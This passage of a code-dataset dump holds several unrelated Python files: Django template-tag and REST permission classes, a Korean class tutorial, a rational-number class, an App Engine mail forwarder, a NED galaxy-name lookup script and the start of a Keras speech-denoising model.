tokens)\n\n\nclass TagMeta(type):\n \"\"\"\n Metaclass for the Tag class that set's the name attribute onto the class\n and a _decorated_function pseudo-function which is used by Django's\n template system to get the tag name.\n \"\"\"\n def __new__(cls, name, bases, attrs):\n parents = [base for base in bases if isinstance(base, TagMeta)]\n if not parents:\n return super(TagMeta, cls).__new__(cls, name, bases, attrs)\n tag_name = attrs.get('name', get_default_name(name))\n\n def fake_func():\n pass # pragma: no cover\n\n fake_func.__name__ = tag_name\n attrs['_decorated_function'] = fake_func\n attrs['name'] = tag_name\n return super(TagMeta, cls).__new__(cls, name, bases, attrs)\n\n\nclass Tag(TagMeta('TagMeta', (Node,), {})):\n \"\"\"\n Main Tag class.\n \"\"\"\n options = Options()\n\n def __init__(self, parser, tokens):\n self.kwargs, self.blocks = self.options.parse(parser, tokens)\n self.child_nodelists = []\n for key, value in self.blocks.items():\n setattr(self, key, value)\n self.child_nodelists.append(key)\n\n def render(self, context):\n \"\"\"\n INTERNAL method to prepare rendering\n Usually you should not override this method, but rather use render_tag.\n \"\"\"\n items = self.kwargs.items()\n kwargs = dict([(key, value.resolve(context)) for key, value in items])\n kwargs.update(self.blocks)\n return self.render_tag(context, **kwargs)\n\n def render_tag(self, context, **kwargs):\n \"\"\"\n The method you should override in your custom tags\n \"\"\"\n raise NotImplementedError\n\n def __repr__(self):\n return '' % self.name\n","sub_path":"classytags/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":3980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"566754223","text":"# class\n\"\"\"\n- 새로운 이름 공간을 지원하는 단위 : 데이터의 설계도\n- 새로운 클래스는 새로운 자료형을 정의하는 것\n- 인스턴스는 이 자료형의 객체를 생성하는 것\n- 클래스와 인스턴트는 직접적인 연관관계를 갖는다\n\n- 인스턴스에서 클래스 멤버의 접근은 가능\n- 클래스 멤버에서 인스턴스 멤버의 접근은 불가\n\"\"\"\n\nclass MyString(str): #str을 상속받은 새로운 클래스\n pass\n\n# 특정 클래스를 상속받지 않을 경우, object 상속\ns = MyString() # 생성자 호출\nprint(type(s))\n\n# 어떤 클래스를 상속 받은 클래스인가?\n# __bases__ -> 부모의 목록을 튜플로 반환\nprint(\"MyString의 부모:\", MyString.__bases__)\n\n# 특정 부모를 상속받지 않을 경우 () 는 없어도 된다\nclass myobj: # 기본적으로 object를 상속\n pass\n\nprint(myobj.__bases__)\n\n# 파이썬은 여러 부모로부터의 상속을 허용한다\nclass Complex(str, myobj):\n # str로부터 모든 멤버들,\n # myobj로부터 모든 멤버들을 물려받는다\n pass\n\nprint(\"Complex의 부모:\", complex.__bases__)\n\n# 특정 클래스가 다른 클래스의 자식인지 확인\n# issubclass 함수\nprint(\"Complex가 str의 자식인가?\", issubclass(Complex, str))\n\n# 클래스의 생성\n# 인스턴스를 위한 멤버는 항상 self를 붙여준다\nclass Point:\n # 클래스 멤버:\n # 클래스 이름 공간 내에 생성\n # 모든 인스턴스 멤버 공유\n # 클래스 멤버는 인스턴스 생성 없이도 사용할 수 있다\n instance_count = 0\n\n def __init__(self, x=0, y=0): # 생성자\n # 파이썬은 여러 개의 생성자를 만들 수 없으므로\n # 범용적으로 사용될 수 있는 유일한 생성자를 작성\n self.x = x\n self.y = y\n Point.instance_count += 1\n\n def __del__(self): # 소멸자\n # 객체가 제거될 때 호출\n Point.instance_count -= 1\n def __str__(self): # 문자열 출력\n # str() 호출 혹은 print를 할때 사용되는\n # 비공식 문자열( 일반 사용자 대신\n return \"Point x={}, y={}\".format(\n self.x, self.y\n )\n\n def __repr__(self): # 문자열 출력\n # 개발자용, 공식문자열\n # repr() 함수로 전달받을 수 있다\n # 이 문자열로 해당 객체를 복원해 낼 수 있어야 한다\n return \"Point({}, {})\".format(\n self.x, self.y\n )\n\n def setX(self, x):\n self.x = x\n\n def setY(self, y):\n self.y = y\n\n def getX(self):\n return self.x\n\n def getY(self):\n return self.y\n\n# 연산자 오버로딩\n# 새로운 데이터 타입에 필요한 연산자의 행동을 재정의하는 것\n# 산술 연산자 오버로딩 예제\n def __add__(self, other):\n # Point(self) + other\n # other 타입을 점검 각기 다른 행동을 취하도록\n if isinstance(other, Point):\n # 합산된 객체가 point\n self.x += other.x\n self.y += other.y\n elif isinstance(other, int):\n self.x += other\n self.y += other\n else:\n self += other\n\n return self\n\n # 역이항 연산자 : other + point\n def __radd__(self, other):\n if isinstance(other, str):\n return other +str(self)\n elif isinstance(other, int):\n self.x += other\n self.y += other\n else:\n self + other\n return self\n\n\n\ndef bound_class_method():\n # 생성된 인스턴스를 통해 직접 매서드에 접근하는 방법\n p = Point()\n # bound 방식의 경우, 첫 번째 인자 self는 전달하지 않아도 된다\n p.setX(10)\n p.setY(20)\n\n print(\"Point p: {}, {}\".format(p.getX(), p.getY()))\n print(p.getX, p.getY())\n\n# bound_class_method()\n\ndef unbound_class_method():\n # 클래스를 통해 우회 접근하는 경우\n # 메서드에 부여된 self 인자에 실제 객체의 주소 전달\n p = Point()\n Point.setX(p, 10)\n Point.setY(p, 20)\n\n print(\"Point p: {}, {}\".format(Point.getX(p),Point.getY(p)))\n print(Point.getX, Point.getY)\n\n# unbound_class_method()\n\ndef class_member():\n p1 = Point()\n p2 = Point()\n\n # 클래스 멤버는 모든 인스턴스에서 접근 가능\n # 생성 없이도 직접 접근가능\n\n print(\"p1의 instance_count의 주소:\", id(p1.instance_count))\n print(\"p2의 instance_count의 주소:\", id(p2.instance_count))\n # 클래스 멤버의 변경\n # 공유 메모리 영역으로 활용할 수 있다\n Point.instance_count += 1\n print(\"p2의 instance_count:\", p2.instance_count)\n\n# class_member()\n\ndef lifecycle():\n # 생성자와 소멸자 테스트\n p1 = Point() # 생성자의 기본값이 사용\n print(p1)\n print(\"instance_count:\", Point.instance_count)\n\n p2 = Point(x=20, y=30)\n print(\"instance_count:\", Point.instance_count)\n\n del p2\n print(\"instance_count:\", Point.instance_count)\n\n# lifecycle()\n\ndef str_repr():\n p = Point(10,20)\n print(p) # __str__ 호출\n\n print(\"포인트 p=\"+str(p)) #__str__\n\n # repr 함수를 사용하면 __reor__ 문자열을 얻을 수 있다\n print(\"repr of p:\", repr(p))\n\n #eval 함수를 사용하면 파이썬 코드를 테스트할 수 있다\n # 이떄 repr 로 전달받은 문자열(개발자용)을 넘겨주면\n #같은 객체가 복원되어야 한다\n p_repr = eval(repr(p))\n print(p_repr, type(p_repr))\n\n# str_repr()\n\ndef test_overloading():\n # 연산자 오버로딩\n p = Point(10, 20)\n print(\"p:\", p)\n p2 = Point(30, 40)\n\n print(\"산술연산자 테스트:\", p + p2)\n print(\"Point + int:\", p + 20)\n\n print(\"int + point:\", 20 + p)\n # int 입장에서 Point와의 + 불가\n # Point 입장에서 int 합산을 재정의 : 역이항\n print(\"포인트 p = \" + p)\n\ntest_overloading()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"bitpy_adv/adv_class.py","file_name":"adv_class.py","file_ext":"py","file_size_in_byte":5967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"143989970","text":"#! /usr/bin/env python3.7\n\n\"\"\"A class representing rational numbers.\n\nA rational number is a number that can be expressed as the ratio of two\ninteger values. That is,\n\n A rational number is a number that can be in the form p/q\n where p and q are integers and q is not equal to zero.\n\"\"\"\n\n\n# pylint: disable=invalid-name\n\n\ndef gcd(bigger, smaller):\n \"\"\"Calculate the greatest common divisor of two positive integers.\"\"\"\n if not bigger > smaller: # swap if necessary so bigger > smaller\n bigger, smaller = smaller, bigger\n\n while smaller != 0:\n remainder = bigger % smaller\n bigger, smaller = smaller, remainder\n\n return bigger\n\n\ndef lcm(a, b):\n \"\"\"Calculate the lowest common multiple of two positive integers.\"\"\"\n return (a * b) // gcd(a, b)\n\n\nclass Rational:\n \"\"\"Rational with numerator and denominator. Denominator parameter defaults to 1.\"\"\"\n\n def __init__(self, numerator, denominator=1):\n \"\"\"Initialize an instance of Rational.\"\"\"\n self.__numerator = numerator\n self.__denominator = denominator\n\n @property\n def numerator(self):\n \"\"\"Get the value of the numerator.\"\"\"\n return self.__numerator\n\n @property\n def denominator(self):\n \"\"\"Get the value of the denominator.\"\"\"\n return self.__denominator\n\n def __str__(self):\n \"\"\"Compute string representation for printing.\"\"\"\n return f\"{self.__numerator}/{self.__denominator}\"\n\n def __repr__(self):\n \"\"\"Use in the interpreter. Call __str__ for now.\"\"\"\n return self.__str__()\n\n def __add__(self, other):\n \"\"\"Add two Rationals.\"\"\"\n if isinstance(other, int):\n other = Rational(other)\n\n if isinstance(other, Rational):\n # find a common denominator (lcm)\n lcm_ = lcm(self.denominator, other.denominator)\n # multiply each by the lcm, then add\n numerator_sum = (lcm_ * self.numerator / self.denominator) + (\n lcm_ * other.numerator / other.denominator\n )\n else:\n pass\n # will most likely result in an exception being thrown\n return Rational(int(numerator_sum), lcm_)\n\n def __sub__(self, other):\n \"\"\"Subtract two Rationals.\"\"\"\n if isinstance(other, int):\n other = Rational(other)\n\n if isinstance(other, Rational):\n # subtraction is the same but with '-' instead of '+'\n lcm_ = lcm(self.denominator, other.denominator)\n numerator_diff = (lcm_ * self.numerator / self.denominator) - (\n lcm_ * other.numerator / other.denominator\n )\n else:\n pass\n # will most likely result in an exception being thrown\n return Rational(int(numerator_diff), lcm_)\n\n def reduce_rational(self):\n \"\"\"Return the reduced fractional value as a Rational.\"\"\"\n gdc_ = gcd(self.numerator, self.denominator)\n return Rational(self.numerator // gdc_, self.denominator // gdc_)\n\n def __eq__(self, other):\n \"\"\"Compare two Rationals for equality, return Boolean.\"\"\"\n if isinstance(other, int):\n other = Rational(other)\n\n if isinstance(other, Rational):\n # reduce both; then check that numerators and denominators are equal\n reduced_self = self.reduce_rational()\n reduced_other = other.reduce_rational()\n return (\n reduced_self.numerator == reduced_other.numerator\n and reduced_self.denominator == reduced_other.denominator\n )\n else:\n pass\n # will most likely result in an exception being thrown\n\n\nif __name__ == \"__main__\":\n a = Rational(1, 5)\n b = Rational(3, 5)\n print(f\"{a} + {b} = {a + b}\")\n\n c = Rational(1, 5)\n d = 1\n print(f\"{c} + {d} = {c + d}\")\n\n e = Rational(3, 3)\n f = 1\n print(f\"{e} == {f} is {e == f}\")\n\n g = 1\n h = Rational(3, 3)\n print(f\"{g} == {h} is {g == h}\")\n\n c = 1\n d = Rational(1, 5)\n print(f\"{c} + {d} = {c + d}\")\n","sub_path":"more_on_classes/rational_v4.py","file_name":"rational_v4.py","file_ext":"py","file_size_in_byte":4077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"84899441","text":"import re\nimport logging\n\ntry:\n from google.appengine.api import mail\nexcept ImportError:\n import sys\n sys.path.append(\"/usr/local/google_appengine\")\n sys.path.append(\"/usr/local/google_appengine/lib/yaml/lib\")\n from google.appengine.api import mail\n\n\ndef do_markdown( msg):\n \"\"\"docstring for do_markdown\"\"\"\n from markdown2 import Markdown\n markdowner = Markdown()\n msg.html = markdowner.convert(msg.body)\n return msg\n\nclass mail_processor(object):\n \"\"\"docstring for MailProcessor\"\"\"\n address_book = {\n 'post' : 'post@posterous.com',\n }\n email_aliases = {}\n filters = {\n 'm' : ('Markdown', do_markdown),\n }\n\n default_filters = ['m']\n\n def __init__(self):\n super(mail_processor, self).__init__()\n\n def process(self, incoming_message):\n \"\"\"docstring for process\"\"\"\n \n bodies = incoming_message.bodies(content_type='text/plain')\n allBodies = \"\"; \n for body in bodies:\n allBodies = allBodies + \"\\n\\n\" + body[1].decode()\n \n outgoing_message = mail.EmailMessage(\n to = self.to_maker(incoming_message),\n sender = self.sender_maker(incoming_message.sender),\n subject = incoming_message.subject,\n body = allBodies,\n )\n \n (filters_to_apply, outgoing_message) = self.filter_chooser(outgoing_message)\n for (name, f) in filters_to_apply:\n logging.info('Applying %s' % (name))\n outgoing_message = f(outgoing_message)\n return outgoing_message\n\n @staticmethod\n def clean_email_address(address):\n \"\"\"docstring for clean_email_address\"\"\"\n add_re = re.compile(r'.*<(.+@.*\\..+)>')\n m = add_re.search(address)\n if m:\n address = m.group(1)\n else:\n address = address.split('<')[-1].strip('>')\n return address.lower()\n\n def to_maker(self, msg):\n \"\"\"docstring for to_maker\"\"\"\n if isinstance(msg.to, list):\n address = msg.to[0]\n else:\n address = msg.to\n \n address = self.clean_email_address(address)\n address = address.split('@')[0]\n if address == 'test':\n return msg.sender\n \n if address in self.address_book:\n return self.address_book[address]\n \n return address.replace('$', '@')\n \n def sender_maker(self, em):\n \"\"\"docstring for sender_maker\"\"\"\n s = self.clean_email_address(em)\n s = self.email_aliases.get(s, s)\n logging.info('Sender = %s' % (s))\n return s\n\n\n\n def filter_chooser(self, msg):\n \"\"\"docstring for filter_chooser\"\"\"\n # Subject ends with [m,jk,foo,e] string that specifies filters to apply\n filter_subject = re.compile(r'\\s*\\[([a-z]{1,3},?)+\\]$')\n filters_to_apply = filter_subject.findall(msg.subject)\n if not filters_to_apply:\n filters_to_apply = self.default_filters\n else:\n msg.subject = filter_subject.sub('', msg.subject)\n return ([self.filters[f] for f in filters_to_apply], msg)\n ","sub_path":"mail_processor.py","file_name":"mail_processor.py","file_ext":"py","file_size_in_byte":3187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"273095547","text":"#!/usr/bin/env python\n'''\nget the NED name for the cleaned sample by querying NED\n\nINPUT: vf_clean_sample.fits\n\nOUTPUT: vf_clean_sample_wNEDname.fits\n\nPROCEDURE:\n- first try to use the file /home/rfinn/research/Virgo/supersample/ned_names.fits\n- look up each object according to its vf_clean_sample.superName \n - check this against the ned_names.NEDinput\n - ned_names.NEDname is the corresponding ned name\n\n'''\n\nimport os\nimport numpy as np\nimport time\n\nfrom astropy.io import fits, ascii\nfrom astropy.table import Table, join, hstack, vstack, Column, MaskedColumn \nfrom astropy.coordinates import SkyCoord\nimport astropy.units as u\n\nfrom astroquery.ned import Ned\n\nfrom matplotlib import pyplot as plt\n\nfrom virgoCommon import *\n\n\nimport argparse\nparser = argparse.ArgumentParser(description ='Create a crazy big catalog from HL, AGC, NSA')\nparser.add_argument('--version',dest = 'version', default='v1',help='version of tables. default is v1')\nparser.add_argument('--evcc',dest = 'evcc', default=False,action='store_true',help='run for evcc catalog containing galaxies not in our original table')\n \nargs = parser.parse_args()\n\nif args.evcc:\n outfile_suffix = '_'+args.version+'_evcc'\nelse:\n outfile_suffix = '_'+args.version\n\n\nclass getNED:\n def __init__(self,clean_catalog):\n self.cat = Table(fits.getdata(clean_catalog))\n def get_NEDname(self):\n\n # skip for now until other parts are working\n # if file with NED names already exists from a previous query,\n # read the file\n\n self.nedfile = 'ned_names'+outfile_suffix+'.fits'\n if os.path.exists(self.nedfile):\n print('found file '+self.nedfile+'\\nUsing this instead of querying NED')\n self.get_NEDname_from_file()\n self.write_clean() \n else:\n #sys.exit() # for testing purposes\n print('querying NED names from database')\n self.get_NEDname_query()\n def get_NEDname_from_file(self):\n \n nednames = Table(fits.getdata(self.nedfile))\n self.nednames = nednames\n # do a left join of the input catalog and nednames\n # using column nednames.NEDinput and cat.superName\n\n #self.cat.rename_column('superName','NEDinput')\n self.cat.add_column(self.cat['superName'],name='NEDinput')\n\n # join returns a table that is sorted by the key columns\n # the following command gets table back into its original order\n self.newtab = myjoinleft(self.cat,nednames,keys='NEDinput')\n\n \n # fix case for UGC09348, until we run the full query again...\n # this is where HL has the wrong coordinates/association\n flag = self.newtab['NEDinput'] == 'UGC09348'\n if (sum(flag) > 0) & self.newtab['NEDra'].mask[flag]: # hasn't been matched\n # assign ned RA and DEc from NGC 5658\n flag2 = nednames['NEDname']=='NGC 5658'\n if sum(flag2) > 0:\n self.newtab['NEDra'][flag] = nednames['NEDra'][flag2]\n self.newtab['NEDdec'][flag] = nednames['NEDdec'][flag2]\n self.newtab['NEDname'][flag] = 'UGC 09348'\n else:\n print('ruh roh')\n # fix case for PGC2586382 , until we run the full query again...\n # NED doesn't recognize 'PGC2586382', but it does know LEDA 2586382\n # it will also find the NSA ID, so I need to not just use the superName\n # I need to keep stepping through other name options if it doesn't return\n # a match to HL or AGC or NSA name\n flag = self.newtab['NEDinput']== 'PGC2586382'\n if (sum(flag) > 0) & self.newtab['NEDra'].mask[flag]: # hasn't been matched\n self.newtab['NEDra'][flag] = 226.398865 \n self.newtab['NEDdec'][flag] = 59.093766\n self.newtab['NEDname'][flag] = 'WISEA J150535.77+590537.2'\n\n # fix case for NGC 2793, until we run the full query again...\n # The NSA ID from version 1 doesn't get a NED match, but the\n # NSA ID from version 0 does...\n flag = self.newtab['NSAID_2']==135797\n if (sum(flag) > 0) & self.newtab['NEDra'].mask[flag]: # hasn't been matched\n self.newtab['NEDra'][flag] = 139.197125\n self.newtab['NEDdec'][flag] = 34.429806\n self.newtab['NEDname'][flag] = 'NGC 2793'\n \n\n # fix case for UGC 08, until we run the full query again...\n # The NSA ID from version 1 doesn't get a NED match, but the\n # NSA ID from version 0 does...\n flag = self.newtab['superName']=='UGC08656 NOTES01'\n if (sum(flag) > 0) & self.newtab['NEDra'].mask[flag]: # hasn't been matched\n self.newtab['NEDra'][flag] = 205.129878\n self.newtab['NEDdec'][flag] = 42.993819\n self.newtab['NEDname'][flag] = 'UGC 08656 NOTES01'\n \n \n # for those without a match by NEDname, look through the\n # entries with NEDinput = 'byposition'\n \n no_match_by_name = self.newtab['NEDname'].mask\n print(no_match_by_name)\n pos_match_indices = np.arange(len(self.cat))[no_match_by_name]\n\n # shorten NED catalog to those that were matched by location\n # this should make search by location faster\n self.nednames_bypos = nednames[nednames['NEDinput'] == 'bylocation']\n #nedcoord = SkyCoord(self.nednames_bypos['NEDra'],self.nednames_bypos['NEDdec'],unit='deg',frame='icrs') \n #self.catcoord = SkyCoord(self.cat['RA'],self.cat['DEC'],unit='deg',frame='icrs') \n for i in pos_match_indices:\n d = np.sqrt((self.newtab['RA'][i]-self.nednames_bypos['NEDra'])**2 + \\\n (self.newtab['DEC'][i]-self.nednames_bypos['NEDdec'])**2)\n if (min(d) < 10./3600):\n j = np.where(d == min(d))[0][0] \n #print(i,j,'found a match!')\n\n self.newtab['NEDinput'][i]='bylocation'\n self.newtab['NEDname'][i] = self.nednames_bypos['NEDname'][j]\n self.newtab['NEDra'][i] = self.nednames_bypos['NEDra'][j]\n self.newtab['NEDdec'][i] = self.nednames_bypos['NEDdec'][j]\n self.newtab.write('test.fits',format='fits',overwrite=True)\n \n # for those with no match, query NED\n \n def query_unmatched(self,startindex=0):\n ## running query for those that haven't yet been matched to an entry in the catalog\n ##\n\n no_match_by_name = self.cat['NEDname'].mask\n pos_match_indices = np.arange(len(self.cat))[no_match_by_name]\n \n \n for i in pos_match_indices:\n foundit=False\n \n time.sleep(.5)\n coord = SkyCoord(self.cat['RA'][i],self.cat['DEC'][i],unit=(u.deg,u.deg), frame='icrs')\n print(i,self.cat['RA'][i],self.cat['DEC'][i])\n \n try:\n t = Ned.query_region(coord,radius=10./3600*u.deg, equinox='J2000')\n print(t)\n #t = Ned.query_object('NSA '+str(self.cat['NSAID_2'][i]))\n self.cat['NEDname'][i] = t['Object Name'][0]\n self.cat['NEDra'][i] = t['RA'][0]\n self.cat['NEDdec'][i] = t['DEC'][0]\n self.cat['NEDinput'][i] = 'bylocation'\n foundit=True\n continue\n except IndexError:\n print('IndexError')\n pass\n except:\n print(i,'NED did not like search by coordinate for this object')\n\n if not(foundit):\n print(\"oh no - could not find NED name! so sorry...\",i)\n self.cat['NEDname'][i] = ''\n self.cat['NEDra'][i] = -999\n self.cat['NEDdec'][i] = -999\n \n\n def write_NEDnames(self):\n nedtable = Table([self.cat['NEDinput'],self.cat['NEDra'],self.cat['NEDdec'],self.cat['NEDname']])\n nedtable.write(self.nedfile,format='fits',overwrite=True) \n\n \n def get_NEDname_query(self,startindex=0):\n ## GOT BLOCKED BY NED FOR TOO MANY QUERIES\n ## TRYING ANOTHER APPROACH - TO MATCH TO CATALOG I DOWNLOADED FROM DEC\n \n # look up NED name for each galaxy\n # https://astroquery.readthedocs.io/en/latest/ned/ned.html\n\n\n # if in HL, look up HL name\n NEDid = []\n NEDra = []\n NEDdec = []\n NEDinput = []\n \n for i in range(startindex,len(self.cat['objname'])):\n #for i in range(20): \n # check if HL id exists, look up NED name\n # if yes, break\n #\n # if no NED comes back\n # check if NSA ID exists for that galaxy. if yes, look up NED name\n # if NED name is found, break\n #\n # if no NED name comes back\n # check if A100 ID exists for that galaxy. if yes, look up NED name\n # if no Ned name comes back, then no NED name!\n #\n foundit=False\n if self.cat['HLflag'][i]:\n time.sleep(.5)\n try:\n t = Ned.query_object(self.cat['objname'][i])\n NEDid.append(t['Object Name'][0])\n NEDra.append(t['RA'][0])\n NEDdec.append(t['DEC'][0])\n NEDinput.append(self.cat['objname'][i])\n foundit=True\n continue\n except IndexError:\n pass\n except:\n print(i,'2 NED did not like ',self.cat['objname'][i])\n pass\n \n\n if self.cat['NSAflag'][i]:\n if not(foundit):\n time.sleep(.5)\n try:\n t = Ned.query_object('NSA '+str(self.cat['NSAID'][i]))\n NEDid.append(t['Object Name'][0])\n NEDra.append(t['RA'][0])\n NEDdec.append(t['DEC'][0])\n NEDinput.append('NSA '+str(self.cat['NSAID'][i]))\n foundit=True\n continue\n except IndexError:\n pass\n except:\n print(i,'2 NED did not like ','NSA '+str(self.cat['NSAID'][i]))\n pass\n if self.cat['A100flag'][i]:\n if not(foundit):\n time.sleep(.5)\n try:\n #print('AGC'+str(self.cat['AGC'][i]))\n t = Ned.query_object('AGC'+str(self.cat['AGC'][i]))\n NEDid.append(t['Object Name'][0])\n NEDra.append(t['RA'][0])\n NEDdec.append(t['DEC'][0])\n NEDinput.append('AGC'+str(self.cat['AGC'][i]))\n foundit=True\n continue\n except IndexError:\n pass\n except:\n print(i,'2 NED did not like ','AGC'+str(self.cat['AGC'][i]))\n pass\n if self.cat['NSA0flag'][i]:\n if not(foundit):\n time.sleep(.5)\n try:\n t = Ned.query_object('NSA '+str(self.cat['NSAID_2'][i]))\n NEDid.append(t['Object Name'][0])\n NEDra.append(t['RA'][0])\n NEDdec.append(t['DEC'][0])\n NEDinput.append('NSA '+str(self.cat['NSAID_2'][i]))\n foundit=True\n continue\n except IndexError:\n pass\n except:\n print(i,'2 NED did not like ','NSA '+str(self.cat['NSAID'][i]))\n pass\n\n # check to make sure that the NED ra and dec\n # is not offset from object\n # we have a few cases where the NED object is wrong\n if foundit:\n distance = np.sqrt((self.cat['RA'][i]-NEDra[-1])**2 + \\\n (self.cat['DEC'][i] - NEDdec[-1])**2)\n if (distance > 10./3600):\n print('NED name is offset from source by {1:.3e} arcsec'.format(distance*3600))\n print('resetting foundit to false')\n foundit = False\n if not(foundit):\n # search by coordinates\n time.sleep(.5)\n coord = SkyCoord(self.cat['RA'][i],self.cat['DEC'][i],unit=(u.deg,u.deg), frame='icrs')\n print(i,self.cat['RA'][i],self.cat['DEC'][i])\n\n try:\n t = Ned.query_region(coord,radius=10./3600*u.deg, equinox='J2000')\n print(t)\n #t = Ned.query_object('NSA '+str(self.cat['NSAID_2'][i]))\n\n # should check if NED name already points to another galaxy\n # and remove it if it does\n if np.sum(np.array(NEDid) == t['Object Name'][0]) > 0:\n # galaxy is already in the list, so position match is wrong\n print('galaxy ', t['Object Name'][0],' is already in the list')\n else:\n \n NEDid.append(t['Object Name'][0])\n NEDra.append(t['RA'][0])\n NEDdec.append(t['DEC'][0])\n NEDinput.append('bylocation')\n\n \n \n foundit=True\n continue\n except IndexError:\n pass\n except:\n print(i,'NED did not like search by coordinate for this object')\n\n if not(foundit):\n print(\"oh no - could not find NED name! so sorry...\",i)\n NEDid.append('')\n NEDra.append(-999)\n NEDdec.append(-999)\n NEDinput.append(-999)\n else:\n print(i,'found NED name')\n\n # ANOTHER CHECK TO ADD\n # find any remaining duplicates\n # if only one has NEDinput == 'bylocation', \n # then remove the ned name for the duplicate that has 'bylocation'\n\n \n c1 = Column(NEDid,name='NEDname')\n c2 = Column(np.array(NEDra,'f8'),name='NEDra')\n c3 = Column(np.array(NEDdec,'f8'),name='NEDdec')\n c4 = Column(NEDinput,name='NEDinput') \n self.NEDid = NEDid\n self.NEDra = NEDra\n self.NEDdec = NEDdec\n try:\n #nedtable = Table([c1,c2,c3,c4]).write('ned_names.tbl',format='ipac',overwrite=True)\n\n self.nedtable = Table([c1,c2,c3,c4]).write('ned_names'+outfile_suffix+'.fits',format='fits',overwrite=True) \n except:\n print(\"couldn't write ned names\")\n \n self.cat.add_columns([c1,c2,c3,c4])\n self.cat.write('vf_clean_sample_wNEDname'+outfile_suffix+'.fits',format='fits',overwrite=True)\n def get_GL_NEDname(self):\n # for galaxies with no NED match, use GL's catalog to match\n # HL name to NEDname (he did a position match for those that didn't return a NED name\n # when searching by name\n ref = fits.getdata(homedir+'/github/Virgo/tables/nsa_HyperLeda_NED_Steer2017dist_Virgo_field_sources_extension_H0_74_0_final_Kim2016corr_inclCOsample.fits')\n\n \n\n def write_clean(self):\n #self.newtab.write('vf_clean_sample_wNEDname.fits',format='fits',overwrite=True)\n # updating for v1\n # this is where RA and DEC are converted to \n self.newtab.write('vf_clean_sample_wNEDname'+outfile_suffix+'.fits',format='fits',overwrite=True)\n\n\nif __name__ == '__main__':\n os.chdir('/home/rfinn/research/Virgo/supersample/')\n ###################################################################\n #### INPUT FILES\n ###################################################################\n #n = getNED('vf_clean_sample.fits') # for v0\n n = getNED('vf_clean_sample_v1.fits') # for v1 \n n.get_NEDname()\n #n.query_unmatched()\n #n.write_NEDnames()\n\n","sub_path":"programs/get_NEDname.py","file_name":"get_NEDname.py","file_ext":"py","file_size_in_byte":16259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"472920961","text":"\nfrom rest_framework import permissions\nfrom .models import *\n#new\nclass IsNotActive(permissions.BasePermission):\n \"\"\"\n checking if user is already active or not.\n \"\"\"\n def has_permission(self, request, view):\n if request.user.is_active == True:\n return False\n return True\nclass IsOwnerOrReadOnly(permissions.BasePermission):\n \"\"\"Custom permission class which allow\n object owner to do all http methods\"\"\"\n\n def has_object_permission(self, request, view, obj):\n if request.method in permissions.SAFE_METHODS:\n return True\n\n return obj.author.id == request.user.id\n\n\nclass IsOwnerOrPostOwnerOrReadOnly(permissions.BasePermission):\n \"\"\"Custom permission class which allow comment owner to do all http methods\n and Post Owner to DELETE comment\"\"\"\n\n def has_object_permission(self, request, view, obj):\n if request.method in permissions.SAFE_METHODS:\n return True\n\n if request.method == 'DELETE' and \\\n obj.post.author.id == request.user.id:\n return True\n\n return obj.author.id == request.user.id","sub_path":"akggram/insta/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"392708416","text":"from tensorflow.keras.layers import Conv2D, Input, LeakyReLU, Flatten, Dense, Reshape, Conv2DTranspose, BatchNormalization, Activation\nfrom tensorflow.keras import Model, Sequential\n\nfrom SpeechDenoiserCNN.FeatureExtractor import FeatureExtractor\nimport sounddevice as sd\nimport tensorflow as tf\nimport numpy as np\nimport librosa\nimport pyaudio\nimport scipy\nimport socket\nimport struct\nimport audioop\nimport os\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"-1\"\n\nwindowLength = 256\noverlap = round(0.25 * windowLength) # overlap of 75%\nffTLength = windowLength\ninputFs = 48e3\nfs = 16e3\nnumFeatures = ffTLength//2 + 1\nnumSegments = 8\n\n\nclass SpeechDenoiser:\n \n def read_audio(self,filepath, sample_rate, normalize=True):\n audio, sr = librosa.load(filepath, sr=sample_rate)\n if normalize:\n div_fac = 1 / np.max(np.abs(audio)) / 3.0\n audio = audio * div_fac\n return audio, sr\n\n def build_model(self,l2_strength):\n inputs = Input(shape=[numFeatures,numSegments,1])\n x = inputs\n\n # -----\n x = tf.keras.layers.ZeroPadding2D(((4,4), (0,0)))(x)\n x = Conv2D(filters=18, kernel_size=[9,8], strides=[1, 1], padding='valid', use_bias=False,\n kernel_regularizer=tf.keras.regularizers.l2(l2_strength))(x)\n x = Activation('relu')(x)\n x = BatchNormalization()(x)\n\n skip0 = Conv2D(filters=30, kernel_size=[5,1], strides=[1, 1], padding='same', use_bias=False,\n kernel_regularizer=tf.keras.regularizers.l2(l2_strength))(x)\n x = Activation('relu')(skip0)\n x = BatchNormalization()(x)\n\n x = Conv2D(filters=8, kernel_size=[9,1], strides=[1, 1], padding='same', use_bias=False,\n kernel_regularizer=tf.keras.regularizers.l2(l2_strength))(x)\n x = Activation('relu')(x)\n x = BatchNormalization()(x)\n\n # -----\n x = Conv2D(filters=18, kernel_size=[9,1], strides=[1, 1], padding='same', use_bias=False,\n kernel_regularizer=tf.keras.regularizers.l2(l2_strength))(x)\n x = Activation('relu')(x)\n x = BatchNormalization()(x)\n\n skip1 = Conv2D(filters=30, kernel_size=[5,1], strides=[1, 1], padding='same', use_bias=False,\n kernel_regularizer=tf.keras.regularizers.l2(l2_strength))(x)\n x = Activation('relu')(skip1)\n x = BatchNormalization()(x)\n\n x = Conv2D(filters=8, kernel_size=[9,1], strides=[1, 1], padding='same', use_bias=False,\n kernel_regularizer=tf.keras.regularizers.l2(l2_strength))(x)\n x = Activation('relu')(x)\n x = BatchNormalization()(x)\n\n # ----\n x = Conv2D(filters=18, kernel_size=[9,1], strides=[1, 1], padding='same', use_bias=False,\n kernel_regularizer=tf.keras.regularizers.l2(l2_strength))(x)\n x = Activation('relu')(x)\n x = BatchNormalization()(x)\n \n x = Conv2D(filters=30, kernel_size=[5,1], strides=[1, 1], padding='same', 